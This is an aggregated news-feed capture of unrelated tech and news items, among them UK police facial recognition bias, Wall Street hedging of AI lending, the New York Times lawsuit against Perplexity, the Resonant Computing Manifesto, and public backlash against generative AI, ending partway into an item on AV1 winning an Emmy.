2025-12-05 18:28:01
Testing showing racial bias against black and Asian people prompts watchdog to ask Home Office for explanation The UK’s data protection watchdog has asked the Home Office for “urgent clarity” over racial bias in police facial recognition technology before considering its next steps. The Home Office ...
Original Article

The UK’s data protection watchdog has asked the Home Office for “urgent clarity” over racial bias in police facial recognition technology before considering its next steps.

The Home Office has admitted that the technology was “more likely to incorrectly include some demographic groups in its search results”, after testing by the National Physical Laboratory (NPL) of its application within the police national database.

The report revealed that the technology, which is intended to be used to catch serious offenders, is more likely to incorrectly match black and Asian people than their white counterparts.

In a statement responding to the report, Emily Keaney, the deputy commissioner for the Information Commissioner’s Office, said the ICO had asked the Home Office “for urgent clarity on this matter” in order for the watchdog to “assess the situation and consider our next steps”.

The next steps could include enforcement action, including issuing a legally binding order to stop using the technology or fines, as well as working with the Home Office and police to make improvements.

Keaney said: “Last week we were made aware of historical bias in the algorithm used by forces across the UK for retrospective facial recognition within the police national database.

“We acknowledge that measures are being taken to address this bias. However, it’s disappointing that we had not previously been told about this, despite regular engagement with the Home Office and police bodies as part of our wider work to hold government and the public sector to account on how data is being used in their services.

“While we appreciate the valuable role technology can play, public confidence in its use is paramount, and any perception of bias and discrimination can exacerbate mistrust. The ICO is here to support and assist the public sector to get this right.”

Police and crime commissioners said publication of the NPL’s finding “sheds light on a concerning inbuilt bias” and urged caution over plans for a national expansion, which could include cameras being placed at shopping centres, stadiums and transport hubs, without putting in place adequate safeguards.

The findings were released on Thursday, hours after Sarah Jones, the policing minister, had described the technology as the “biggest breakthrough since DNA matching”.

Facial recognition technology scans people’s faces and cross-references the images against watchlists of known or wanted criminals. It can be used while examining live footage of people passing cameras, comparing their faces with those on wanted lists, or to enable officers to target individuals as they walk by mounted cameras.

Police officers can also retrospectively run images of suspects through police, passport or immigration databases to identify them and check their backgrounds.

Analysts who examined the police national database’s retrospective facial recognition technology tool at a lower setting found that “the false positive identification rate (FPIR) for white subjects (0.04%) is lower than that for Asian subjects (4.0%) and black subjects (5.5%)”.

The testing found that the number of false positives for black women was particularly high. “The FPIR for black male subjects (0.4%) is lower than that for black female subjects (9.9%),” the report said.

Responding to the report, a Home Office spokesperson said the department took the findings “seriously”, and had already taken action, including procuring and testing a new algorithm “which has no statistically significant bias”.

“Given the importance of this issue, we have also asked the police inspectorate, alongside the forensic science regulator, to review law enforcement’s use of facial recognition. They will assess the effectiveness of the mitigations, which the National Police Chiefs’ Council supports,” the spokesperson said.

Quick Guide

Contact us about this story

Show

The best public interest journalism relies on first-hand accounts from people in the know.

If you have something to share on this subject, you can contact us confidentially using the following methods.

Secure Messaging in the Guardian app

The Guardian app has a tool to send tips about stories. Messages are end to end encrypted and concealed within the routine activity that every Guardian mobile app performs. This prevents an observer from knowing that you are communicating with us at all, let alone what is being said.

If you don't already have the Guardian app, download it ( iOS / Android ) and go to the menu. Select ‘Secure Messaging’.

SecureDrop, instant messengers, email, telephone and post

If you can safely use the Tor network without being observed or monitored, you can send messages and documents to the Guardian via our SecureDrop platform .

Finally, our guide at theguardian.com/tips lists several ways to contact us securely, and discusses the pros and cons of each.

Illustration: Guardian Design / Rich Cousins

Wall Street races to protect itself from AI bubble

Hacker News
rollingout.com
2025-12-05 18:21:43
Comments...
Original Article

Banks are lending unprecedented sums to technology giants building artificial intelligence infrastructure while quietly using derivatives to shield themselves from potential losses.

Wall Street finds itself in an unusual position as it prepares to lend staggering amounts to artificial intelligence companies. Even as banks facilitate what may become the largest borrowing binge in technology history, they are simultaneously deploying an arsenal of financial tools to protect themselves from the very bubble their money might be inflating.

The anxiety permeating credit markets tells the story. The cost of insuring Oracle debt against default through derivatives has climbed to levels not seen since the Global Financial Crisis. Morgan Stanley has explored using specialized insurance mechanisms to reduce exposure to its tech borrowers. Across trading desks, lenders are quietly hedging positions even as they publicly champion the transformative potential of artificial intelligence.


Unprecedented Wall Street lending to technology giants

Mega offerings from Oracle, Meta Platforms and Alphabet have pushed global bond issuance past $6.46 trillion in 2025. These hyperscalers, alongside electric utilities and related firms, are expected to spend at least $5 trillion racing to build data centers and infrastructure for technology promising to revolutionize the global economy.

The scale is so immense that issuers must tap virtually every major debt market, according to JPMorgan Chase analysis. These technology investments could take years to generate returns, assuming they deliver profits at all. The frenzied pace has left some lenders dangerously overexposed, prompting them to use credit derivatives, sophisticated bonds and newer financial products to shift underwriting risk to other investors.


Technology that may not translate to profits

Steven Grey, chief investment officer at Grey Value Management, emphasized that impressive technology does not automatically guarantee profitability. Those risks became tangible last week when a major outage halted trading at CME Group and served as a stark reminder that data center customers can abandon providers after repeated breakdowns. Following that incident, Goldman Sachs paused a planned $1.3 billion mortgage bond sale for CyrusOne, a data center operator.

Banks have turned aggressively to credit derivatives markets to reduce exposure. Trading of Oracle credit default swaps exploded to roughly $8 billion over the nine weeks ended November 28, according to analysis of trade repository data by Barclays credit strategist Jigar Patel. That compares to just $350 million during the same period last year.

Banks are providing the bulk of massive construction loans for data centers where Oracle serves as the intended tenant, likely driving much of this hedging activity, according to recent Morgan Stanley research. These include a $38 billion loan package and an $18 billion loan to build multiple new data center facilities in Texas, Wisconsin and New Mexico.

Hedging costs climb across the sector

Prices for protection have risen sharply across the board. A five year credit default swap agreement to protect $10 million of Microsoft debt from default would cost approximately $34,000 annually, or 34 basis points, as of Thursday. In mid October, that same protection cost closer to $20,000 yearly.

Andrew Weinberg, a portfolio manager at Saba Capital Management, noted that the spread on Microsoft default swaps appears remarkably wide for a company rated AAA. The hedge fund has been selling protection on the tech giant. By comparison, protection on Johnson & Johnson, the only other American company with a AAA rating, cost about 19 basis points annually on Thursday.

Weinberg suggested that selling protection on Microsoft at levels more than 50% wider than fellow AAA rated Johnson & Johnson represents a remarkable opportunity. Microsoft, which has not issued debt this year, declined to comment. Similar opportunities exist with Oracle, Meta and Alphabet, according to Weinberg. Despite their large debt raises, their credit default swaps trade at high spreads relative to actual default risk, making selling protection sensible. Even if these companies face downgrades, the positions should perform well because they already incorporate substantial potential bad news.

Sophisticated tools to Wall Street shift risk

Morgan Stanley, a key player in financing the artificial intelligence race, has considered offloading some data center exposure through a transaction known as a significant risk transfer. These deals can provide banks with default protection for between 5% and 15% of a designated loan portfolio. Such transfers often involve selling bonds called credit linked notes, which can have credit derivatives tied to companies or loan portfolios embedded within them. If borrowers default, the bank receives a payout covering its loss.

Morgan Stanley held preliminary talks with potential investors about a significant risk transfer tied to a portfolio of loans to businesses involved in AI infrastructure, Bloomberg reported Wednesday. Mark Clegg, a senior fixed income trader at Allspring Global Investments, observed that banks remain fully aware of recent market concerns about possible overinvestment and overvaluation. He suggested it should surprise no one that they might explore hedging or risk transfer mechanisms.

Private capital firms including Ares Management have been positioning themselves to absorb some bank exposure through significant risk transfers tied to data centers. The massive scale of recent debt offerings adds urgency to these efforts. Not long ago, a $10 billion deal in the American high grade market qualified as big. Now, with multi trillion dollar market capitalization companies and funding needs in the hundreds of billions, Teddy Hodgson, global co head of investment grade debt capital markets at Morgan Stanley, suggested that $10 billion represents merely a drop in the bucket. He noted that Morgan Stanley raised $30 billion for Meta in a drive by financing executed in a single day, an event not historically commonplace. Investors will need to adjust to bigger deals from hyperscalers given how much these companies have grown and how expensive capturing this opportunity will prove.

New York Times sues AI startup for ‘illegal’ copying of millions of articles

Guardian
www.theguardian.com
2025-12-05 18:19:12
Perplexity AI also faces lawsuit from Murdoch-owned Dow Jones and New York Post for its use of copyrighted content The New York Times sued an embattled artificial intelligence startup on Friday, accusing the firm of illegally copying millions of articles. The newspaper alleged Perplexity AI had dist...
Original Article

The New York Times sued an embattled artificial intelligence startup on Friday, accusing the firm of illegally copying millions of articles. The newspaper alleged Perplexity AI had distributed and displayed journalists’ work without permission en masse.

The Times said that Perplexity AI was also violating its trademarks under the Lanham Act, claiming the startup’s generative AI products create fabricated content, or “hallucinations”, and falsely attribute them to the newspaper by displaying them alongside its registered trademarks.

The newspaper said that Perplexity’s business model relies on scraping and copying content, including paywalled material, to power its generative AI products. Other publishers have made similar allegations.

The lawsuit is the latest salvo in a bitter , ongoing battle between publishers and tech companies over the use of copyrighted content without authorization to build and operate their AI systems.

Perplexity in particular has become a target of multiple legal disputes and faces similar accusations from a number of publishers as it tries to aggressively build market share in a hyper-competitive market for generative AI tools. Cloudflare, one of the world’s most prominent digital infrastructure companies, accused Perplexity earlier this year of hiding its web-crawling activities and scraping websites without permission – a serious accusation with potential copyright implications. Perplexity denied the allegations.

Perplexity has raised about $1.5bn in the past three years through multiple funding rounds, most recently closing a $200m round in September that valued the company at $20bn. It has attracted a variety of big-name investors , including Nvidia and Jeff Bezos, as money has flooded the AI industry.

San Francisco-based Perplexity AI also faced a lawsuit from the Rupert Murdoch-owned Dow Jones and the New York Post.

Multiple news outlets , including Forbes and Wired , have accused Perplexity of plagiarizing their content, in one case allegedly copying a Wired article about Perplexity’s own plagiarism issues. The Chicago Tribune , Merriam-Webster Dictionary and Encyclopedia Britannica have all additionally filed lawsuits against Perplexity in recent months, accusing the company of copyright infringement.

In October, social media company Reddit also sued Perplexity in New York federal court, accusing it and three other companies of unlawfully scraping its data to train Perplexity’s AI-based search engine.

Perplexity faces legal challenges from its fellow tech companies as well. Amazon last month filed a lawsuit against Perplexity over the search engine’s AI agent shopping feature. The suit alleged that Perplexity was covertly accessing Amazon users’ accounts and masking its AI browsing activities, which Perplexity has denied while accusing Amazon of bullying and attempting to stifle competitors.

Perplexity did not immediately respond to a Reuters request for comment.

WikiFlix: Full Movies Hosted on Wikimedia Commons

Hacker News
commons.wikimedia.org
2025-12-05 18:08:19
Comments...
Original Article

From Wikimedia Commons, the free media repository

Map

Filming locations of public domain and freely licensed films.

Films that have won awards

[ edit ]

Here are some award-winning movies:

Academy Award for Best Actor

[ edit ]

Academy Award for Best Actress

[ edit ]

1927-09-23
1927
1927-11-04
91 min

Academy Award for Best Animated Short Film

[ edit ]

Academy Award for Best Art Direction, Black and White

[ edit ]

Academy Award for Best Cinematography

[ edit ]

Academy Award for Best Director

[ edit ]

Academy Award for Best Documentary (Short Subject)

[ edit ]

Academy Award for Best Documentary Feature Film

[ edit ]

Academy Award for Best Picture

[ edit ]

1927
1929-01-10
1927-05-19
1927-08-12
1929-01-05
141 min

Academy Award for Best Story

[ edit ]

1927
1927-08-20
1927-10-29
105 min

Academy Honorary Award

[ edit ]

Annecy Cristal for a Feature Film

[ edit ]

Filmfare Award for Best Film

[ edit ]

Filmfare Award for Best Music Director

[ edit ]

Hundred Flowers Award for Best Animation

[ edit ]

National Board of Review: Top Ten Films

[ edit ]

National Film Award for Best Bengali Feature Film

[ edit ]

National Film Award for Best Feature Film

[ edit ]

1959-05-01
1960-10-04
101 min

Silver Bear for Best Director

[ edit ]

Stalin Prize for Literature and Art

[ edit ]

End of auto-generated list.

Behind the Blog: Hearing AI Voices and 'Undervolting'

403 Media
www.404media.co
2025-12-05 17:53:23
This week, we discuss PC woes, voice deepfakes, and mutual aid....
Original Article

This is Behind the Blog, where we share our behind-the-scenes thoughts about how a few of our top stories of the week came together. This week, we discuss PC woes, voice deepfakes, and mutual aid.

JOSEPH: Today I’m speaking at the Digital Vulnerabilities in the Age of AI Summit (DIVAS) (good name) on a panel about the financial risks of AI. The way I see it, that applies to the scams and are being powered by AI.

As soon as a new technology is launched, I typically think of ways it might be abused. Sometimes I cover this, sometimes not, but the thought always crosses my mind. One example that did lead to coverage was back at Motherboard in 2023 with an article called How I Broke Into a Bank Account With an AI-Generated Voice.

At the time, ElevenLabs had just launched. This company focuses on audio and AI and cloning voices. Basically you upload audio (originally that could be of anyone before ElevenLabs introduced some guardrails) and the company then lets you ‘say’ anything as that voice. I spoke to voice actors at the time who were obviously very concerned .

This post is for paid members only

Become a paid member for unlimited ad-free access to articles, bonus podcast content, and more.

Subscribe

Sign up for free access to this post

Free members get access to posts like this one along with an email round-up of our week's stories.

Subscribe

Already have an account? Sign in

Shingles vaccination prevented or delayed dementia

Hacker News
www.cell.com
2025-12-05 17:47:16
Comments...

bulk email delivery problems to outlook/hotmail/microsoft

May First Status Updates
status.mayfirst.org
2025-12-05 17:42:13
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Servers Affected/Servidores afectados: Mail relay servers Period Affected/Horas afectadas: 2025-12-01 - Date/Fecha: 2025-12-05 We are currently experiencing a higher than normal number of bounces when sending bulk email to Microsoft email servers (i...
Original Article

Welcome to the May First Movement Technology Status Page

Please see below for any known interuptions to our service. If you are experiencing a problem not listed here, please open a support ticket .

Subscribe to an RSS feed of these alerts, get them by email , or learn how to subscribe to other messages .

Return to mayfirst.coop

bulk email delivery problems to outlook/hotmail/microsoft

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Servers Affected/Servidores afectados: Mail relay servers
Period Affected/Horas afectadas: 2025-12-01 -
Date/Fecha: 2025-12-05

We are currently experiencing a higher than normal number of bounces when
sending bulk email to Microsoft email servers (including outlook.com, hotmail.com and
others).

This does not affect individual email.

We are working on it.

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEH5wwyzz8XamYf6A1oBTAWmB7dTUFAmkzX8UACgkQoBTAWmB7
dTXDFhAAn++09egH7+yChrO5FQNjN2BcMP9pdHv4vsfCM+HOEGga/soc3OY3ZDdb
jULRZKh5tV/rnWgsTIce2+JWoO3yjjnSGrqEY/qODP+2+JQeawbjgf1DlTf/LXC9
S0zDJS8YAgsvpZoMhD0eRJ22KG3MAtc2m7NPAzEScfUSv7t/ntJKNjCJ8WROYtee
Ox5MWXeApMe1C4LLfEpcOL21O8zJcbJaf/MyMaZBUt+8GefB6kbT64r0RDQgK0ec
6SuLnnjnrgas7pm9tW4ybWSbh68IupZij7lBmBXtosjh8cJL6m3RXR6akL2BumSe
1wLCjuW8PhU0E41lT3KmvQ7PP6ikxKbZ95G7Qf211YLTb+Vn+dskiTH9gAzlScZk
03zVHb2FtmDU37AohZ3coMOv8qsg7zJw7y8faiXAE6UP3fX9H9g0S7KpsUyq93q1
3sSDvp1Tfv2DrOI/63QTLzn68oPb44rzHwqPThqEoXBLfZ1q3A5gLU+cGcvEjq1A
Wkw3/n2mwZhfcy0YQjFGy/YhWVszxSJCscakKkCm4TbbYYgB+CXIu6k5r2o02yE/
Mu6J2br0rvR+7ahK8c8mi1jLga1pH9VvPJQYaAZWf+MZfegRvBRF6e24F3Tj7ccs
wgNfOVc1dmBMsx9EQ3g6TrGgu6trw58DMFYR+SzKbDTNjmBUwXY=
=pSac
-----END PGP SIGNATURE-----

The Resonant Computing Manifesto

Lobsters
resonantcomputing.org
2025-12-05 17:34:24
Comments...
Original Article

We shape our environments, and thereafter they shape us.

Great technology does more than solve problems. It weaves itself into the world we inhabit. At its best, it can expand our capacity, our connectedness, our sense of what's possible. Technology can bring out the best in us.

Our current technological landscape, however, does the opposite. Feeds engineered to hijack attention and keep us scrolling, leaving a trail of anxiety and atomization in their wake. Digital platforms that increasingly mediate our access to transportation, work, food, dating, commerce, entertainment—while routinely draining the depth and warmth from everything they touch. For all its grandiose promises, modern tech often leaves us feeling alienated, ever more distant from who we want to be.

The people who build these products aren't bad or evil. Most of us got into tech with an earnest desire to leave the world better than we found it. But the incentives and cultural norms of the tech industry have coalesced around the logic of hyper-scale. It's become monolithic, magnetic, all-encompassing—an environment that shapes all who step foot there. While the business results are undeniable, so too are the downstream effects on humanity.

With the emergence of artificial intelligence, we stand at a crossroads. This technology holds genuine promise. It could just as easily pour gasoline on existing problems. If we continue to sleepwalk down the path of hyper-scale and centralization, future generations are sure to inherit a world far more dystopian than our own.

But there is another path opening before us.


Christopher Alexander spent his career exploring why some built environments deaden us, while others leave us feeling more human, more at home in the world. His work centered around the "quality without a name," this intuitive knowing that a place or an architectural element is in tune with life. By learning to recognize this quality, he argued, and constructing a building in dialogue with it, we could reliably create environments that enliven us.

We call this quality resonance . It's the experience of encountering something that speaks to our deeper values. It's a spark of recognition, a sense that we're being invited to lean in, to participate. Unlike the digital junk food of the day, the more we engage with what resonates, the more we're left feeling nourished, grateful, alive. As individuals, following the breadcrumbs of resonance helps us build meaningful lives. As communities, companies, and societies, cultivating shared resonance helps us break away from perverse incentives, and play positive-sum infinite games together.

For decades, technology has required standardized solutions to complex human problems. In order to scale software, you had to build for the average user, sanding away the edge cases. In many ways, this is why our digital world has come to resemble the sterile, deadening architecture that Alexander spent his career pushing back against.

This is where AI provides a missing puzzle piece. Software can now respond fluidly to the context and particularity of each human—at scale. One-size-fits-all is no longer a technological or economic necessity. Where once our digital environments inevitably shaped us against our will, we can now build technology that adaptively shapes itself in service of our individual and collective aspirations. We can build resonant environments that bring out the best in every human who inhabits them.


And so, we find ourselves at this crossroads. Regardless of which path we choose, the future of computing will be hyper-personalized. The question is whether that personalization will be in service of keeping us passively glued to screens—wading around in the shallows, stripped of agency—or whether it will enable us to direct more attention to what matters.

In order to build the resonant technological future we want for ourselves, we will have to resist the seductive logic of hyper-scale, and challenge the business and cultural assumptions that hold it in place. We will have to make deliberate decisions that stand in the face of accepted best practices—rethinking the system architectures, design patterns, and business models that have undergirded the tech industry for decades.

We suggest these five principles as a starting place:

  1. Private: In the era of AI, whoever controls the context holds the power. While data often involves multiple stakeholders, people must serve as primary stewards of their own context, determining how it's used.
  2. Dedicated: Software should work exclusively for you, ensuring contextual integrity where data use aligns with your expectations. You must be able to trust there are no hidden agendas or conflicting interests.
  3. Plural: No single entity should control the digital spaces we inhabit. Healthy ecosystems require distributed power, interoperability, and meaningful choice for participants.
  4. Adaptable: Software should be open-ended, able to meet the specific, context-dependent needs of each person who uses it.
  5. Prosocial: Technology should enable connection and coordination, helping us become better neighbors, collaborators, and stewards of shared spaces, both online and off.

We, the signatories of this manifesto, are committed to building, funding, and championing products and companies that embed these principles at their core. For us, this isn't a theoretical treatise. We're already building tooling and infrastructure that will enable resonant products and ecosystems.

But we cannot do it alone. None of us holds all the answers, and this movement cannot succeed in isolation. That's why, alongside this manifesto, we're sharing an evolving list of principles and theses. These are specific assertions about the implementation details and tradeoffs required to make resonant computing a reality. Some of these stem from our experiences, while others will be crowdsourced from practitioners across the industry. This conversation is only just beginning.

If this vision resonates, we invite you to join us. Not just as a signatory, but as a contributor. Add your expertise, your critiques, your own theses. By harnessing the collective intelligence of people who earnestly care, we can chart a path towards technology that enables individual growth and collective flourishing.

Sign the manifesto

Explore & contribute to the theses of resonant computing


Contributors

The following individuals drafted and released this manifesto:

Maggie Appleton
Samuel Arbesman
Daniel Barcay
Rob Hardy
Aishwarya Khanduja
Alex Komoroske
Geoffrey Litt
Michael Masnick
Brendan McCord

Bernhard Seefeld
Ivan Vendrov
Amelia Wattenberger
Zoe Weinberg
Simon Willison

with illustrations by
Forest Stearns

Signatories

The following individuals have signed in support:

Tim O'Reilly

Kevin Kelly

Bruce Schneier

Hiten Shah

Eric Ries

Joel Lehman

Packy McCormick

Danielle Perszyk

Jim Rutt

Peter Wang

Brad Burnham

Kent Beck

Eugene Wei

Gary William Flake

Lenny Rachitsky

John Seely Brown

Roy Bahat

Jonathan Zittrain

Max Read

Harper Reed

Lawrence Lessig

Evan Henshaw-Plath

Anjan Katta

Yancey Strickler

Uri Bram

Rohit Krishnan

Simon Taylor

David A Smith

Peter van Hardenberg

E. Glen Weyl

Linda Liukas

Adam Davidson

Mark A. Lemley

Matt Beane

Chad Kohalyk

James Edward Dillard

Ben mathes

Goblin Oats

Chris Lunt

Curran Dwyer

Ben Follington

Stuart Buck

Bridget Harris

Chad Fowler

Kyle Morris

Sean Thielen-Esparza

Janfj

Yatú Espinosa

Alex Zhang

Anna Mitchell

`Steve Kirkham

Scott Moore

Jason Zhao

Jad Esber

Joel Dietz

Lola Agabalogun

Tony Espinoza

Arjun Khoosal

Tony Curzon Price

Maximilian Eusterbrock

Beth Anderson

Anastasia Uglova

Jordan Erlends

Samuel Robson

Andrew Conner

Menno Schaap

Philipp Banhardt

Berlynn Bai

Arun

Louis Barclay

Gabriel Raubenheimer

Roman Leventov

Corey James

Ben Mayhew

Kyle Cox

Pierre Chuzeville

Lucabrando Sanfilippo

Jai Gandhi

Carsten Peters

Raghuvir Kasturi

B. Scot Rousse

Ilan Strauss

Yash Sharma

Sean McKeon

Gurupanguji

Zoë Chazen

John Luther

Blain Smith

Menelaos Mazarakis

Konstantinos Komaitis

Eddy Abraham

Justin Mares

Aastha JS

Marisa Rama

Seb Agertoft

Christina Kirsch

Peter Voss

Shoumik Dabir

Mike McCormick

Riley Wong

Matt Hawes

Michele Canzi

Matt Jones

Jonathan Lebensold

Francisco Javier Arceo

Noah Ringler

Simone Cicero

Lex Sokolin

Erika Rice Scherpelz

Sahar Mor

max bittker

Avni Patel Thompson

Chaim Gingold

Matt Ziegler

Daniel Hatkoff

Kamran Hakima

Rupert Manfredi

Mark Moriarty

Jordan Rubin

Rebecca Mqamelo

Chenoe Hart

Rob Flickenger

Michael Lapadula

Dan Garon

Sean Lynch

Michael Tanzillo

Reggie James

Sam Barton

Anthea Roberts

Andrew Rose

Kevin Roark

Matt Holden

Leon Markham

Sam Weston

Rudolf Laine

Mark Whiting

Christine Gibson

Vivian Chong

Florian Weber

Luke Chatelain

Dan Bornstein (@danfuzz)

Marcus Estes

Kasra Kyanzadeh

Rishi Ishairzay

Nicholas Chirls

Lola Wajskop

William Kelly

Michael Greig

Jasnam Sidhu

dougfort

Lev Eliezer Israel

Mathilde Grant

Nathaniel Evans

Jessica Johnston

Benoit Pimpaud

Ross Matican

Natalie Breitkopf

Nirit Weiss-Blatt

James Sinka

Grace Kantrow

Robinson Eaton

Tom Rielly

Jason Shellen

EdZ

Juan Suarez

Selipso

Toto Tvalavadze

Brian "Beej Jorgensen" Hall

Hiraeth Wax

Dave Sanford

Rida Al Barazi

Baba Buehler

Will Henderson

Johannes Ernst

Gernot Poetsch

Ian Mulvany

Xavi Duran

Steve Della Valentina

Gabriel Cubbage

Marcel Goethals

Ashish Uppala

Ted Wood

Al Mithani

Carlos Pinto

Joël Gombin

Jassi Singh

Patrick Farrell

Steven Feuerstein

Alexia Petrakos

Quentin Hardy

Daniel Müller

Jorge Arango

Tom Usher

Jake Simonds

Luke Hubbard

Oren Maximov

Arun krishnasamy

Kingsley Uyi Idehen

Christopher David

mig

Giedrius Jaloveckas

Yuval Yeret

Mario Zechner

Alex Reynish

William Philpott

Sireesh Gururaja

Stephen Band

Peergos

Joey Tyson

Ankesh Bharti

Tommy Falkowski

Ruthvik Reddy SL

Raymond Zhong

Ramin Firoozye

Jeff Smith

David M. Schulman

Scott Rosenberg


Changelog

Substantive changes that have been made to this manifesto:

11/18/25 - Changed several instances of the word "user," to "people" or other humanistic alternatives. The word user carries heavy connotations of addiction.

10/28/25 - Updated the first principle (private) to include more nuanced language around the ownership of data. People must be the primary stewards of their context, but every system has multiple stakeholders.

10/28/25 - Updated the second principle (dedicated) to include the "contextual integrity" privacy model.

10/27/25 - Added header artwork and poetic introduction.

The AI Backlash Is Here: Why Public Patience with Tech Giants Is Running Out

Hacker News
www.newsweek.com
2025-12-05 17:29:47
Comments...
Original Article

On OpenAI’s new social app, Sora 2, a popular video shows a disturbingly lifelike Sam Altman sprinting out of a Target store with stolen computer chips, begging police not to take his “precious technology.” The clip is absurdist, a parody of the company’s own CEO, but it also speaks to a larger conversation playing out in dinner conversations, group chats and public spaces around the country: What, exactly, is this technology for?

From ads scrawled with graffiti to online comment sections filled with mockery, the public’s patience with AI-generated media is starting to wear thin. Whether it's YouTube comments deriding synthetic ad campaigns or scribbled in Sharpie across New York City subway posters for AI startups, the public's discontent with the AI boom is growing louder.

What began in 2022 as broad optimism about the power of generative AI to make peoples' lives easier has instead shifted toward a sense of deep cynicism that the technology being heralded as a game changer is, in fact, only changing the game for the richest technologists in Silicon Valley who are benefiting from what appears to be an almost endless supply of money to build their various AI projects — many of which don't appear to solve any actual problems. Three years ago, as OpenAI's ChatGPT was making its splashy debut, a Pew Research center survey found that nearly one in five Americans saw AI as a benefit rather than a threat. But by 2025, 43 percent of U.S. adults now believe AI is more likely to harm them than help them in the future, according to Pew.


Slop as a Service

As AI spreads, public skepticism is turning into into open hostility toward its products and ads. Campaigns made with generative AI are mocked online and vandalized in public. Friend, a startup that spent $1 million on a sprawling campaign in the New York City subway with more than 11,000 advertisements on subway cars, 1,000 platform posters, and 130 urban panels, has been hit especially hard. Most of its ads were defaced with graffiti calling the product “surveillance capitalism” and urging people to “get real friends.”

"AI doesn't care if you live or die," reads one tag on a Friend ad in Brooklyn.

Other brands like Skechers are seeing similar backlash for an AI-generated campaign showing a distorted woman in sneakers, dismissed as lazy and unprofessional. Many of the Skechers subway posters were quickly defaced — some tagged with “slop,” the memeified shorthand for AI’s cheap, joyless flood of content, now embodied by the Altman deepfakes flooding Sora.

“The idea of authenticity has long been at the center of the social media promise, for audiences and content creators alike. But a lot of AI-generated content is not following that logic,” said Natalia Stanusch, a researcher at AI Forensics, a nonprofit that investigates the impact of artificial intelligence on digital ecosystems.

“With this flood of content made using generative AI, there is a threat of social media becoming less social and users are noticing this trend,” she told Newsweek .

'Wildly Oversold'

In an era where the boundaries between the digital and physical worlds are becoming nearly indistinguishable, one thing is becoming increasingly clear: the skepticism toward generative artificial intelligence is rising on both sides of the political divide. What once held the promise of innovation in the arts—an AI that could generate art, compose music or write coherent, even beautiful, prose—has begun to feel more like saturation.

The friction isn’t just about quality—it’s about what the ubiquity of these tools signals. In entertainment, backlash has mounted as high-profile artists find themselves cloned without consent. After an AI-generated song mimicking his voice went viral on TikTok, rapper Bad Bunny lashed out on WhatsApp, telling his 19 million followers that, if they enjoyed the track, “you don’t deserve to be my friends.” Similar complaints came from Drake and The Weeknd whose own AI replicas were pulled from streaming platforms after public outcry.

“The public is finally starting to catch on,” said Gary Marcus, a professor emeritus at NYU and one of the field’s most vocal critics. “Generative AI itself may be a fad and certainly has been wildly oversold.”

That saturation, according to Marcus and others, has less to do with AI’s breakthroughs and more to do with the way companies have stripped out human labor under the guise of innovation. It's a shift that has turned into backlash—one fueled not only by developers and ethicists but by cultural figures, creators and the general public.

Alex Hanna, director of research at the Distributed AI Research Institute (DAIR) and co-author of The A.I. Con : How to Fight Big Tech’s Hype and Create the Future We Want —a critique of large language models (LLMs), the technology behind AI systems like ChatGPT and Sora—told Newsweek that public opinion is increasingly aligning with his criticism.

“We’re seeing this narrative that AI is this inevitable future and it's being used to shut down questions about whether people actually want these tools or benefit from them,” Hanna said. “It becomes an excuse to displace workers, to automate without accountability, and with serious questions about its impact on the environment.”

“Companies want to make it look like AI is magic,” Hanna added. “But behind that magic is a labor force, data that’s been extracted without consent and an entire system built on exploitation.”

One telling example: Meta ’s recent launch of Vibes, a TikTok-style video app featuring only AI-generated content, was met with widespread mockery. “No one asked for this,” one viral post read. Stanusch, of AI Forensics, agreed: “For the near future, we don’t expect this adoption to slow down but rather increase,” she said.

Even as capital flows into AI infrastructure buildouts, the cultural effect of so much "slop" is creating its own language of resistance. The term “clanker”—borrowed from Star Wars and repurposed by Gen Z—has exploded in popularity on TikTok as a meme-slur for robots and AI systems replacing human jobs. The term, while satirical, reflects deeper anxieties about labor displacement, particularly among younger workers entering an economy being transformed by AI.

Still, some see a long-term upside. “The robots are coming, and they’re coming for everyone’s jobs," said Adam Dorr, director of research at RethinkX, in an interview with Newsweek . “But in the longer term, AI could take over the dangerous, miserable jobs we’ve never wanted to do.”

Dorr, like others, urges caution—not rejection. “The challenge is: how do we make this transformation safely?” he said. “People are right to be scared. We’re already on the train—and the destination may be great but the journey will be chaotic.”

The Bubble Threat

From mental health chatbots and short-form video apps to corporate ad campaigns and toilet cameras that can analyze feces, AI is everywhere, and billions of dollars are still pouring in.

But saturation breeds doubt: what might look like cutting-edge innovation to investors is starting to look like a bubble to everyone else.

In just the first half of 2025, global investment in AI infrastructure topped $320 billion, with $225 billion coming from U.S. hyperscalers and sovereign-backed funds, according to IDC. Microsoft alone committed over $50 billion to data center expansion this year. Meta, Amazon, OpenAI and others are backing the $500 billion Stargate AI initiative — championed by the Trump administration.

Since returning to office, Donald Trump has made AI central to his economic agenda, fast-tracking permitting for AI infrastructure and declaring in a recent speech: “We will win the AI race just like we did the space race.”

Stargate

But many experts are unconvinced the numbers add up. “AI spending outpacing current real economic returns is not a problem—that’s what many innovative technologies call for,” Andrew Odlyzko, professor emeritus at the University of Minnesota, told Newsweek . “The problem is that current (and especially projected) AI spending appears to be outpacing plausible future real economic returns.”

Odlyzko warned that much of the sector is propped up by “circular investment patterns,” in which AI companies fund one another without enough real customer demand. In one such example, Nvidia recently said it would invest $100 billion in OpenAI to help it build massive data centers, essentially backstopping its own customer. “If there was a big rush of regular non-AI companies paying a lot for AI services, that would be different," Odlyzko said. "But there is no sign of it.”

Other experts like British technology entrepreneur Azeem Azhar have compared the current capex boom to past busts. “The trillions pouring into servers and power lines may be essential,” he wrote on his Substack, “but history suggests they are not where enduring profits accumulate.”

And while lawsuits over AI training data have begun piling up—including one filed by The New York Times against OpenAI—others center on how generative tools imitate distinct styles. A viral 2025 trend saw ChatGPT produce Studio Ghibli-style images so convincingly that it appeared the beloved Japanese animation studio had endorsed the platform. They had not.

In the meantime, so far, AI remains deeply unprofitable at scale. Last month, the consulting firm Bain predicted the AI industry would need to be making $2 trillion in combined annual revenues by 2030 to meet expected data center demand — a shortfall of roughly $800 billion.

“There is a lack of deep value,” the tech columnist and AI critic Ed Zitron told Newsweek . “The model is unsustainable.” And yet, with billions of dollars and the weight of national policy behind it, even skeptics agree: if and when the AI bubble bursts, its impact will ripple far beyond Silicon Valley.

When a video codec wins an Emmy

Lobsters
blog.mozilla.org
2025-12-05 17:12:29
Comments...
Original Article

It’s not every day a video codec wins an Emmy. But yesterday, the Television Academy honored the AV1 specification with a Technology & Engineering Emmy Award , recognizing its impact on how the world delivers video content.

